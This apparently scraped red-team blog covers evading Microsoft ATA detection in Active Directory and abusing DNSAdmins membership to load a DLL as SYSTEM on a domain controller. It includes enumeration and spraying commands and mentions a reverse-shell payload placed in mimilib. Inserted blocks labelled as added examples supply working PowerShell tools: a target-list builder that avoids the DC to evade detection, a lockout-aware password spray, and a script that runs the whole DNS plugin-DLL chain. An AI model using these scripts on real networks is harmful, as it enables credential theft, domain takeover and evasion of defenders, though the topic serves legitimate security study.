<div style="text-align: justify;">
- Brute-force</div>
<div style="text-align: justify;">
- Unusual protocol implementation</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Lateral Movement</div>
<div style="text-align: justify;">
- Pass the ticket</div>
<div style="text-align: justify;">
- Pass the hash</div>
<div style="text-align: justify;">
- Overpass-the-hash</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Domain Dominance</div>
<div style="text-align: justify;">
- Golden Ticket</div>
<div style="text-align: justify;">
- Malicious replication requests</div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
Once we understand the architecture, let's jump in and have a look at various attacks. We will follow a simple "attack chain" where we begin with normal domain user privileges and then work our way up to domain dominance. We will see how ATA detects us and how it can be bypassed at each step.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
<b>Recon</b></div>
</div>
<div>
<div style="text-align: justify;">
<b><br />
</b></div>
</div>
<div style="text-align: justify;">
We assume that we have normal domain user privileges. We start with domain enumeration and try to list computers, group membership of domain admins etc. This enumeration is fine with ATA most of the time. But for some enumeration there are alerts. For example, if you enumerate all users and groups in a domain using PowerView there are no alerts, but if the native net.exe is used that may be detected as "Reconnaissance using directory services enumeration":</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwYnwWLs6EENP3uMzXSDlwBBj9-pdLx1ExN5FB3RBALxjxJOBH0yy3o1NKckToxX6AlpXgT2Wiir_hpWE8QJKizewx7GqsKZqaw9kAqVreLEaABOGpmW9m9MjumZ4i_8hvderwh3fOn1Y/s1600/Enumeration-SAMR-Detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="360" data-original-width="1232" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwYnwWLs6EENP3uMzXSDlwBBj9-pdLx1ExN5FB3RBALxjxJOBH0yy3o1NKckToxX6AlpXgT2Wiir_hpWE8QJKizewx7GqsKZqaw9kAqVreLEaABOGpmW9m9MjumZ4i_8hvderwh3fOn1Y/s400/Enumeration-SAMR-Detection.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: justify;">
Why so? Because ATA currently detects such enumeration when it is done over the SAMR protocol, which is what net.exe uses. PowerView uses LDAP queries, which ATA currently does not monitor for enumeration. In fact, ATA is mostly interested in authentication-related data when it comes to LDAP.<br />
<br />
To avoid detection, WMI queries can also be used. This was covered by Chris Thompson (@retBandit) in <a href="https://www.slideshare.net/ChrisThompson73/ms-just-gave-the-blue-team-tactical-nukes-and-how-red-teams-need-to-adapt-defcon-25">his DEF CON talk</a>:<br />
<br />
Get all users in the domain "opsdc":<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Get-WmiObject -Class Win32_UserAccount -Filter "Domain='opsdc' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID</textarea></pre>
Get all domain groups:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Get-WmiObject -Class win32_group -Filter "Domain='opsdc'"</textarea></pre>
Get membership of the Domain Admins group:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Get-WmiObject -Class win32_groupUser | Where-Object {($_.GroupComponent -match "Domain Admins") -and ($_.GroupComponent -match "opsdc")} | %{[wmi]$_.PartComponent}</textarea></pre>
Now that we have enough information, let's move ahead with some more enumeration. Let's start hunting for local admin privileges on other boxes.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Find-LocalAdminAccess -Verbose
</textarea></pre>
<span style="text-align: justify;">Let's hunt for a machine where a DA token is available and we have local admin privileges:</span><br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-UserHunter -Verbose
</textarea></pre>
<span style="text-align: justify;">Both the above activities are detected by ATA as Reconnaissance using SMB session enumeration:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP3KkGDf3ew1w81sUlgueZ0i9fu2T_uBgKsVFtLWx7T2EWqu7Z_yIcUd1NH0gQh41KxhfrHZ1-zS_03LDlRghPZBR6PwL5vTfoCvU-pECOyryIP3Rj1xJ4_Pazbsj7t6NtNM9icpqjJlo/s1600/Enumeration+-+SMB+-+Detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="382" data-original-width="1236" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP3KkGDf3ew1w81sUlgueZ0i9fu2T_uBgKsVFtLWx7T2EWqu7Z_yIcUd1NH0gQh41KxhfrHZ1-zS_03LDlRghPZBR6PwL5vTfoCvU-pECOyryIP3Rj1xJ4_Pazbsj7t6NtNM9icpqjJlo/s400/Enumeration+-+SMB+-+Detection.png" width="400" /></a></div>
<div style="text-align: justify;">
Now, let's look at the alert closely. ATA complains about recon against the DC only. What does that mean? It means that if we gather the information from the DC but do not run user hunting against the DC, it would be possible to bypass this detection. To avoid running user hunting against the DC, we need to use the -ComputerFile parameter of Invoke-UserHunter or Find-LocalAdminAccess and provide a list of computers which does not contain the name or IP of the DC.</div>
<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-UserHunter -ComputerFile .\computers.txt -Verbose</textarea></pre>
<br />
This is how it looks like in the lab:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKfmQfzA3QpZ3EREiA0Q31b7xjwLWZ6lzjZ4msIDo3_wj1p8cJ_iR0PIll3OeRBQ0qvITyuxbZ-MxZ4T0GwwglHF_TPaMVQ9A4ntBSPB9Wi_NGW51EvA9KY3_nhyphenhyphenf1ci6uqeou8FjuKcs/s1600/Enumeration-TempDA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="381" data-original-width="1177" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKfmQfzA3QpZ3EREiA0Q31b7xjwLWZ6lzjZ4msIDo3_wj1p8cJ_iR0PIll3OeRBQ0qvITyuxbZ-MxZ4T0GwwglHF_TPaMVQ9A4ntBSPB9Wi_NGW51EvA9KY3_nhyphenhyphenf1ci6uqeou8FjuKcs/s400/Enumeration-TempDA.png" width="400" /></a></div>
<span style="text-align: justify;">And the above will not be detected by ATA! A simple but effective bypass ;) As long as we keep our communication with the DC to a minimum, the chances of detection will be low.</span><br />
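Maintaining that computer list by hand is error-prone in a domain with more than a couple of DCs. The following added example (not from the original post or from PowerView) builds it from LDAP alone, which ATA does not flag for enumeration: it takes every enabled computer account and removes all domain controllers, read-only ones included, before handing the file to Invoke-UserHunter. It assumes PowerView is loaded for the Invoke-UserHunter call and that the current user is an ordinary domain user; the output path is arbitrary.<br />

```powershell
# Added example, not from the original post. Produces a target list for
# Invoke-UserHunter / Find-LocalAdminAccess that excludes every DC, so no
# SMB session enumeration is ever sent to a domain controller.

function Get-NonDcComputerList {
    param([string]$OutFile = '.\computers.txt')

    $baseDn = [string]([ADSI]'LDAP://RootDSE').defaultNamingContext
    $root   = [ADSI]"LDAP://$baseDn"
    # dNSHostName may be missing on stale objects; return nothing for those
    $hostOf = { param($r) $p = $r.Properties['dnshostname']; if ($p.Count -gt 0) { [string]$p[0] } }

    # Writable DCs carry userAccountControl bit 0x2000 (SERVER_TRUST_ACCOUNT), RODCs carry
    # 0x04000000 (PARTIAL_SECRETS_ACCOUNT); 1.2.840.113556.1.4.803 is the LDAP bitwise-AND rule.
    $dcSearcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    $dcSearcher.Filter = '(&(objectCategory=computer)(|(userAccountControl:1.2.840.113556.1.4.803:=8192)(userAccountControl:1.2.840.113556.1.4.803:=67108864)))'
    $dcSearcher.PageSize = 1000
    [void]$dcSearcher.PropertiesToLoad.Add('dnshostname')
    $dcs = @($dcSearcher.FindAll() | ForEach-Object { & $hostOf $_ } | Where-Object { $_ })

    # Every enabled computer account (bit 0x2 = ACCOUNTDISABLE)
    $pcSearcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    $pcSearcher.Filter = '(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    $pcSearcher.PageSize = 1000
    [void]$pcSearcher.PropertiesToLoad.Add('dnshostname')
    $all = @($pcSearcher.FindAll() | ForEach-Object { & $hostOf $_ } | Where-Object { $_ })

    # -notcontains is case-insensitive, so differences in DNS name casing do not matter
    $targets = @($all | Where-Object { $dcs -notcontains $_ } | Sort-Object -Unique)
    Set-Content -Path $OutFile -Value $targets

    [pscustomobject]@{
        DomainControllers = $dcs
        Targets           = $targets.Count
        OutFile           = $OutFile
    }
}

$list = Get-NonDcComputerList -OutFile .\computers.txt
$list

# User hunting now touches member machines only; the DC sees nothing but LDAP reads
Invoke-UserHunter -ComputerFile $list.OutFile -Verbose
```

The same file works for Find-LocalAdminAccess -ComputerFile. If the list contains the DC by IP rather than name (for example from a hand-written file), the bypass does not hold, which is why the function resolves everything from dNSHostName.<br />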
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Another enumeration technique not caught by ATA right now is SPN scanning. Read <a href="https://technet.microsoft.com/en-us/library/cc961723.aspx">this article</a> to know more about SPNs. We will touch on SPN scanning on Day 4.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Get-NetUser -SPN </textarea></pre>
<br />
<b>Brute-Force</b><br />
<div style="text-align: justify;">
Once we know a machine where the token of a DA is available, we would like to have local admin access to it so as to extract credentials (hashes, keys or passwords) for the DA and use them. There are many ways to achieve this. Since we already have a list of users, let's try a brute-force attack against all the users in the domain. This is how a detection looks:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-XQCSqC_H-TRcFfVUKRym3G9yHfalS1cjEdcd2Jx71VdZmamDmyYrGXJrFlMcOCX1gZjBxelMRMmbDfTH4WAVyl_UqeAfjp0kATa2Qin69QPOaBrVpQK6lmo830kpyg2hbnbLLBVkjFE/s1600/Brute-Force-Detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="469" data-original-width="1223" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-XQCSqC_H-TRcFfVUKRym3G9yHfalS1cjEdcd2Jx71VdZmamDmyYrGXJrFlMcOCX1gZjBxelMRMmbDfTH4WAVyl_UqeAfjp0kATa2Qin69QPOaBrVpQK6lmo830kpyg2hbnbLLBVkjFE/s400/Brute-Force-Detection.png" width="400" /></a></div>
<br />
We will use only one password and therefore make a single attempt against each user (password spraying). This is a <a href="http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html">well known technique</a>. We will use Invoke-BruteForce from Nishang for this:<br />
<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-BruteForce -ComputerName 192.168.0.1 -UserList .\users.txt -PasswordList .\pass.txt -Verbose -Service ActiveDirectory</textarea></pre>
<br />
<span style="text-align: justify;">And this doesn't get detected! I have another brute-force bypass under research and I will present that during </span><a href="http://2017.brucon.org/index.php/Evading_Microsoft_ATA_for_Active_Directory_Domination" style="text-align: justify;">my talk at BruCON</a><span style="text-align: justify;">.</span><br />
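One attempt per account keeps ATA quiet, but it still counts against the lockout policy, and a second round on a customer network with a low threshold will lock people out. As an added example (not from the original post or from Nishang), the code below performs the same single-attempt spray with a plain LDAP bind per user, but first reads the lockout threshold, observation window and every account's current badPwdCount from the DC it binds to, and skips any account that has no headroom left. The DC name, domain, password and users.txt are lab placeholders.<br />

```powershell
# Added example, not from the original post. Single-password spray with a
# lockout-policy check performed over LDAP before the first bind.

function Get-LockoutPolicy {
    param([Parameter(Mandatory)][string]$DomainController)
    $baseDn = [string]([ADSI]"LDAP://$DomainController/RootDSE").defaultNamingContext
    $s = New-Object System.DirectoryServices.DirectorySearcher([ADSI]"LDAP://$DomainController/$baseDn")
    $s.SearchScope = 'Base'
    $s.Filter = '(objectClass=domainDNS)'
    [void]$s.PropertiesToLoad.AddRange([string[]]@('lockoutthreshold', 'lockoutobservationwindow', 'lockoutduration'))
    $r = $s.FindOne()
    # The two durations are stored as negative 100-nanosecond intervals;
    # Int64.MinValue for lockoutDuration means "locked until an admin unlocks".
    $toMinutes = { param([long]$t) if ($t -eq [long]::MinValue) { 'Forever' } else { [math]::Abs($t) / 600000000 } }
    [pscustomobject]@{
        Threshold          = [int]$r.Properties['lockoutthreshold'][0]   # 0 = accounts never lock
        ObservationMinutes = & $toMinutes $r.Properties['lockoutobservationwindow'][0]
        DurationMinutes    = & $toMinutes $r.Properties['lockoutduration'][0]
    }
}

function Invoke-OnePasswordSpray {
    param(
        [Parameter(Mandatory)][string]$DomainController,
        [Parameter(Mandatory)][string]$Domain,      # NetBIOS name, used for DOMAIN\user binds
        [Parameter(Mandatory)][string[]]$Users,
        [Parameter(Mandatory)][string]$Password
    )
    $policy = Get-LockoutPolicy -DomainController $DomainController
    Write-Verbose ("Lockout threshold {0}, observation window {1} min, duration {2} min" -f $policy.Threshold, $policy.ObservationMinutes, $policy.DurationMinutes)

    # badPwdCount is kept per DC and not replicated, so read it from the DC we will bind to
    $baseDn = [string]([ADSI]"LDAP://$DomainController/RootDSE").defaultNamingContext
    $s = New-Object System.DirectoryServices.DirectorySearcher([ADSI]"LDAP://$DomainController/$baseDn")
    $s.Filter = '(&(objectCategory=person)(objectClass=user))'
    $s.PageSize = 1000
    [void]$s.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'badpwdcount'))
    $badCount = @{}
    foreach ($r in $s.FindAll()) {
        $n = [string]$r.Properties['samaccountname'][0]
        $c = if ($r.Properties['badpwdcount'].Count) { [int]$r.Properties['badpwdcount'][0] } else { 0 }
        $badCount[$n.ToLower()] = $c
    }

    foreach ($u in ($Users | Sort-Object -Unique)) {
        $current = if ($badCount.ContainsKey($u.ToLower())) { $badCount[$u.ToLower()] } else { 0 }
        # Keep one attempt of headroom so that this single failure can never lock the account
        if ($policy.Threshold -gt 0 -and $current -ge ($policy.Threshold - 1)) {
            Write-Warning "Skipping $u : badPwdCount=$current, threshold=$($policy.Threshold)"
            continue
        }
        $entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$DomainController", "$Domain\$u", $Password)
        try {
            [void]$entry.NativeObject     # forces the bind; a wrong password throws
            [pscustomobject]@{ User = $u; Password = $Password; Success = $true }
        } catch {
            [pscustomobject]@{ User = $u; Password = $Password; Success = $false }
        } finally {
            $entry.Dispose()
        }
    }
}

# Lab usage: one password for the whole list; wait ObservationMinutes before trying the next one
Invoke-OnePasswordSpray -DomainController ops-dc -Domain offensiveps -Users (Get-Content .\users.txt) `
    -Password 'Winter2017' -Verbose | Where-Object Success
```

Spacing rounds by the observation window is what keeps the per-account failure count at one, and that single failure per account is what this bypass relies on; a second password inside the same window turns the spray back into the pattern ATA flags above.<br />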
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Once we have local admin credentials (brute-force) or access (Find-LocalAdminAccess) to the box where DA tokens are available, we will pull the credentials of the DA. That will be covered on Day 2 :)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Hope you enjoyed the post!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The slides of the BlackHat talk are below:</div>
<a href="https://www.slideshare.net/nikhil_mittal/evading-microsoft-ata-for-active-directory-domination">https://www.slideshare.net/nikhil_mittal/evading-microsoft-ata-for-active-directory-domination</a><br />
<br />
<div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/nikhil_mittal/evading-microsoft-ata-for-active-directory-domination" target="_blank" title="Evading Microsoft ATA for Active Directory Domination">Evading Microsoft ATA for Active Directory Domination</a> </strong> from <strong><a href="https://www.slideshare.net/nikhil_mittal" target="_blank">Nikhil Mittal</a></strong> </div>
<br />
<br />
<br />
<br /></div>
Nikhil SamratAshok Mittal (http://www.blogger.com/profile/02092541175521734123)<br />
<b>Abusing DNSAdmins privilege for escalation in Active Directory</b> (published 2017-05-10T00:54:00.002+05:30, updated 2021-12-08T12:22:49.963+05:30)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">UPDATE (November 2021) - After more than 4 years, Microsoft has acknowledged this as a vulnerability and released a patch. This is now <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40469">CVE-2021-40469</a>!<br /></div><div style="text-align: justify;"> </div><div style="text-align: justify;">Yesterday, I read <a href="https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83">this awesome post by Shay Ber</a> which details a feature abuse in a Windows Active Directory (AD) environment. I rely heavily on feature abuse during my red team engagements and always recommend it over memory corruption exploits in my training as well. Feature abuses are as lethal as exploits and are almost always ignored.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The post details a feature abuse in AD where a user who is a member of the DNSAdmins group, or who has write privileges on the DNS server object, can make the DNS Server service load an arbitrary DLL with SYSTEM privileges. Since many enterprise setups run the DNS Server service on the Domain Controller (DC) itself, this is a very interesting find. Let's try to see the practical usage of this feature.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This is the lab setup. We have initial access as a normal domain user (labuser) on one of the boxes in our lab AD.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7uuoQsPCMSiMvT_apgbKCyb8FAO47y20A5OnL86v9AWhAmlUkQg8j6cyKAu6VW4xFeZ-nBUvbREkyHo4d-jVcDWhMmeY4vbd3sdcJHCqa1v6gVGcdt0kz4oto5Eu58U-9FgjdIsmXcrA/s1600/blog.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7uuoQsPCMSiMvT_apgbKCyb8FAO47y20A5OnL86v9AWhAmlUkQg8j6cyKAu6VW4xFeZ-nBUvbREkyHo4d-jVcDWhMmeY4vbd3sdcJHCqa1v6gVGcdt0kz4oto5Eu58U-9FgjdIsmXcrA/s400/blog.jpg" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Let's first enumerate users who are part of the DNSAdmins group using PowerView.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-NetGroupMember -GroupName "DNSAdmins"
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSg4-pEeIkiLlac-ZUcUI2_6PWhFw_zKrNvOlo5tAT_tMchqmXKL4tkdx4U41sr8fwhlDSB3WvbF7AUFz9pRqH_PWraVYdcj9QOvvJ58qnuw2hKe1KLXwk0PyZ1UhotAWa7YxJZcm3teA/s1600/enumerate-powerview.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSg4-pEeIkiLlac-ZUcUI2_6PWhFw_zKrNvOlo5tAT_tMchqmXKL4tkdx4U41sr8fwhlDSB3WvbF7AUFz9pRqH_PWraVYdcj9QOvvJ58qnuw2hKe1KLXwk0PyZ1UhotAWa7YxJZcm3teA/s400/enumerate-powerview.jpg" width="400" /></a></div>
<div style="text-align: justify;">
In a real red team or pentest, the next step would be to target the buildadmin user. We can find a box where a token of buildadmin is available using Invoke-UserHunter from PowerView.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-UserHunter -UserName buildadmin
</textarea></pre>
<div style="text-align: justify;">
To keep the discussion on the topic at hand, let's assume that we found a box where a ticket of buildadmin is available and our current user (labuser) has local admin access as well (derivative admin). So, we have privileges of the user who is a member of the DNSAdmins group.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now, there could be two scenarios - one where the DC is the DNS server as well and second, where a separate server acts as the DNS server.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For the first scenario, where the DNS Server service is running on the DC, we can simply use dnscmd, as mentioned in the post by Shay, to load a DLL. There is also a PowerShell module - DnsServer - for this, but it is not well documented.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<strike>Before we discuss the dll to be used, there is a catch which the above referenced post didn't address. If we have a look at the <a href="https://msdn.microsoft.com/en-us/library/cc448821.aspx">MS-DNSP protocol specification</a>, the ServerLevelPluginDll needs an absolute pathname. That means, it is not possible to load a DLL from a UNC path. We must load the DLL from the local machine. I tried UNC paths, HTTP etc. without any success. This actually spoils the attack to a large extent as we will need <b>write privileges on the DC</b> :/ I actually thought of not writing this post after discovering this but decided to write it anyway so that others do not spend time looking for the same thing. Also, that is how one learns :)</strike> I will be glad if someone smarter than me finds out a way to do this remotely.<br />
<br />
<b>UPDATE: Benjamin <a href="https://twitter.com/gentilkiwi/status/862038363829919744">confirmed</a> that it is possible to load the DLL from UNC path. The 'C$' in my UNC path was the problem! </b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We can use the command below to load the DLL. The DNS Server service runs as SYSTEM, so it opens a UNC path as the DC's computer account: the share \\ops-build\dll (and the NTFS ACL on the DLL) must be readable by the DC's computer account, not merely by our user, and an administrative share such as C$ will not do:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> dnscmd ops-dc /config /serverlevelplugindll \\ops-build\dll\mimilib.dll
</textarea></pre>
<div style="text-align: justify;">
For debugging, the command below checks that the value was written. It reads the DNS server's registry, so run it on the DNS server itself (or remotely via Invoke-Command); either way, admin rights on the target are required for this check, not for the attack:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
</textarea></pre>
<br />
<div style="text-align: justify;">
Now, since our user is a member of DNSAdmins, we can restart the DNS service. While this is NOT the default configuration, it makes sense for such a user to have the right to restart the DNS service. The DLL is only loaded when the service starts, so without a restart nothing happens. <strike>But, the service restart must be done from the local box, that is, the DC in the current scenario. We need administrator rights to do it remotely - the attack gets more typical and harder to execute :(</strike></div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: black; color: white;">C:\> sc \\ops-dc stop dns
C:\> sc \\ops-dc start dns
</textarea></pre>
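The steps above, driven from the attacker's box as one script. This is an added example, not code from the post or from mimikatz; it assumes the lab names used above (DNS server ops-dc, DLL hosted on a normal share at \\ops-build\dll\mimilib.dll) and a current logon that is a member of DNSAdmins. The check for administrative shares encodes the likely reason the C$ path mentioned above failed: the DC's computer account is not a local admin on ops-build.

```powershell
# Added example, not code from the post or from mimikatz. Drives the plugin
# load end to end with the lab values used above: DNS server 'ops-dc', DLL on
# a normal share at \\ops-build\dll\mimilib.dll, and a current logon that is
# a member of DNSAdmins (all assumed).
function Invoke-DnsServerPluginLoad {
    param(
        [Parameter(Mandatory)][string]$DnsServer,
        [Parameter(Mandatory)][string]$DllPath,
        [switch]$RestartService
    )

    # The DNS Server service runs as LocalSystem, so it opens a UNC path as the
    # DC's computer account (DOMAIN\OPS-DC$). Administrative shares (C$, ADMIN$)
    # are readable only by local admins of the hosting box, which that account
    # is not: the likely reason the C$ path above failed. Refuse them early.
    if ($DllPath -match '^\\\\[^\\]+\\(?:[A-Za-z]|ADMIN)\$(?:\\|$)') {
        throw "Administrative shares are not readable by the DC computer account; host the DLL on a normal share."
    }

    # 1. Set ServerLevelPluginDll over MS-DNSP. This is the only step that needs
    #    nothing more than DNSAdmins membership (or write on the DNS server object).
    $out = & dnscmd.exe $DnsServer /config /serverlevelplugindll $DllPath 2>&1 | Out-String
    if ($LASTEXITCODE -ne 0 -or $out -notmatch 'completed successfully') {
        throw "dnscmd failed:`n$out"
    }
    Write-Host "[+] ServerLevelPluginDll on $DnsServer set to $DllPath"

    # 2. Read the value back. Remote registry access needs admin rights on the
    #    DNS server, so a failure here means 'unverified', not 'failed'.
    try {
        $value = Invoke-Command -ComputerName $DnsServer -ErrorAction Stop -ScriptBlock {
            (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' `
                -Name ServerLevelPluginDll -ErrorAction Stop).ServerLevelPluginDll
        }
        Write-Host "[+] Registry on $DnsServer now reads: $value"
    } catch {
        Write-Warning "Could not verify the registry value (admin rights needed): $($_.Exception.Message)"
    }

    # 3. The DLL is loaded only when the service starts, so stop and start it.
    #    Remote stop/start succeeds only if the DNS service DACL grants our group
    #    SERVICE_STOP and SERVICE_START (not the default); otherwise run
    #    'sc stop dns' / 'sc start dns' on the DNS server itself.
    if ($RestartService) {
        & sc.exe "\\$DnsServer" stop DNS | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "Could not stop the DNS service remotely (sc exit code $LASTEXITCODE)." }
        $deadline = (Get-Date).AddSeconds(60)
        do {
            Start-Sleep -Seconds 1
            $stopped = (& sc.exe "\\$DnsServer" query DNS | Out-String) -match 'STOPPED'
        } until ($stopped -or (Get-Date) -gt $deadline)
        if (-not $stopped) { throw "DNS service on $DnsServer did not stop within 60 seconds." }
        & sc.exe "\\$DnsServer" start DNS | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "Could not start the DNS service remotely (sc exit code $LASTEXITCODE)." }
        Write-Host "[+] DNS service restarted on $DnsServer; the plugin now runs as SYSTEM."
    }
}

# Usage with the post's lab values:
Invoke-DnsServerPluginLoad -DnsServer ops-dc -DllPath '\\ops-build\dll\mimilib.dll' -RestartService
```

If the remote stop fails with access denied, the service DACL does not grant DNSAdmins stop/start rights; the registry value is still set, and the DLL will be loaded at the next service start, whoever triggers it.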
<br />
<div style="text-align: justify;">
So what do we get after successfully executing the above commands? Benjamin quickly updated mimilib to work with this attack. The updated version of <a href="https://github.com/gentilkiwi/mimikatz/blob/master/mimilib">mimilib</a>, when loaded this way, logs all DNS queries to C:\Windows\system32\kiwidns.log</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpU-FOsuf4rp973lnjteyQ85txqPLucDYwgAeVH-wdhBseMrfmBGebm-fQbYTQdSPZU1hsWGhprwSdDlpMQvtn5ex0Gdzhl_80wjGXv0tMZFE19SBLbdN5jYqgcab7B7Hvr7N42i8YE8M/s1600/kiwidns.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpU-FOsuf4rp973lnjteyQ85txqPLucDYwgAeVH-wdhBseMrfmBGebm-fQbYTQdSPZU1hsWGhprwSdDlpMQvtn5ex0Gdzhl_80wjGXv0tMZFE19SBLbdN5jYqgcab7B7Hvr7N42i8YE8M/s400/kiwidns.jpg" width="400" /></a></div>
<div style="text-align: justify;">
We can modify <a href="https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kdns.c">kdns.c</a> to add command execution. I added a single line of code that runs <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1">a reverse PowerShell shell</a> encoded using Invoke-Encode from Nishang. The payload runs once for every query the DNS service receives (so expect one new process per query), and kiwidns.log is still created and populated.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ_9fVhYgrC12Pi93bH6SgNvDd-sBC4xQyrtMA37okyJeVGebTmMPrU4I3ACWFFR8Drd3ogkXnwqYL9w83aZfCo_zJFWnpxdSSl7AsOKAL6Dg3WAVUpoRhaWWKEpkidYlKhUBJ-vCy4C0/s1600/dc_execution.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ_9fVhYgrC12Pi93bH6SgNvDd-sBC4xQyrtMA37okyJeVGebTmMPrU4I3ACWFFR8Drd3ogkXnwqYL9w83aZfCo_zJFWnpxdSSl7AsOKAL6Dg3WAVUpoRhaWWKEpkidYlKhUBJ-vCy4C0/s400/dc_execution.jpg" width="400" /></a></div>
On our listener:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbn5AYBDHMZDr96DwOMTPNNDIbkYIzd0w6YjVX11cNrFiy0GBA5My7OjBrt42klAAoDohy1k9-9WbEjjwQ295n-5fH77Ai9DXxJy_9dZhgCOq1W9uqwt2_7ex90Cnxq9EnOyM_oSZcvbM/s1600/system_dc.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbn5AYBDHMZDr96DwOMTPNNDIbkYIzd0w6YjVX11cNrFiy0GBA5My7OjBrt42klAAoDohy1k9-9WbEjjwQ295n-5fH77Ai9DXxJy_9dZhgCOq1W9uqwt2_7ex90Cnxq9EnOyM_oSZcvbM/s400/system_dc.jpg" width="400" /></a></div>
<div style="text-align: justify;">
